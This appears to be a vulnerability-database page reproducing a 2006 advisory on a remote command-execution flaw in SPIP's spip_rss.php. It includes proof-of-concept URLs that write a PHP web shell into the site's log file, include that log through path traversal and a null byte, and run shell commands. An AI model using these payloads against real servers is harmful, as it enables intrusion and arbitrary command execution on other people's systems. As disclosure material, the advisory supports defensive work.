Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2006-0625

Publish Date: 08 Feb 2006

Author: rgod

                							

                source: http://www.securityfocus.com/bid/16556/info

SPIP is prone to a remote command-execution vulnerability. This is due to a lack of proper sanitization of user-supplied input.

An attacker can exploit this issue to execute arbitrary remote PHP commands on an affected computer with the privileges of the webserver process.

Successful exploitation could facilitate unauthorized access; other attacks are also possible.

Version 1.8.2g and earlier are vulnerable; other versions may also be affected.

http://www.example.com/spip_rss.php?GLOBALS[type_urls]=/../ecrire/data/spip.log%00

http://www.example.com/spip_acces_doc.php3?id_document=0&amp;file=&lt;?system($_GET[cmd]);?&gt;
http://www.example.com/spip_rss.php?cmd=ls%20-la&amp;GLOBALS[type_urls]=/../ecrire/data/spip.log%00

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

SPIP 1.8.2 - 'Spip_RSS.php' Remote Command Execution

Vulmon Search

About

Products

Connect